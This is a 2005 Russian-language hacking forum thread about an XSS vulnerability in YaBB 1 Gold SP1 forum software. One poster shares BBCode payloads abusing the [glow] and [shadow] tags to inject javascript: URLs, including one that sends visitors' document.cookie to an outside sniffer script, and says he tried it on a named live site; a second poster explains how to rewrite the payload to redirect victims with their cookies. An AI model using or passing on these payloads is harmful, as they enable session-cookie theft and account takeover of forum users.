Форумы Уязвимость, YaBB 1 Gold - SP1, XSS атака.

Discussion in 'Уязвимости CMS/форумов' started by Romaxa55, 12 Dec 2005.

Thread Status:
Not open for further replies.
  1. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Code:
    [glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow] 
    или

    Code:
    [shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]
    Что не так в этом коде, проверял на http://www.mgapi.ru/cgi-bin/yabb/
    Code:
    [glow=red);background:url(javascript:img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie);filter:glow(color=red,2,300]Big Exploit[/glow]
     
    #1 Romaxa55, 12 Dec 2005
    Last edited: 12 Dec 2005
  2. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Так. Ну это алерт, а тебе нужно, чтобы приходили куки на сниффер, да? Ну тогда подумай головой=)) Нужно вместо
    HTML:
    alert(document.cookie)
    вставить свой код. К примеру,
    HTML:
    document.location.href='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie
    Но это только пример=)) Попробуй, может получится-)
    Не забываем про РЕПУТАЦИЮ!

    Это уже готовое.

    И не надо изподтишка сообщение редактировать, ок? Я ответил на вопрос, уже новым сообщением пиши, а не редактируй старое!
     
    #2 FQziT, 12 Dec 2005
    Last edited: 12 Dec 2005
    1 person likes this.
  3. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Да спасиб, но проблемма в том что, нет знаний в этой области, вот токо начал изучать.. ща попробую что нить.. Спасиб
     
  4. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Romaxa55 Всегда пожалуйста=)
     
  5. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Думаю тема закрыта, еще раз спасибо FQziT
     
Thread Status:
Not open for further replies.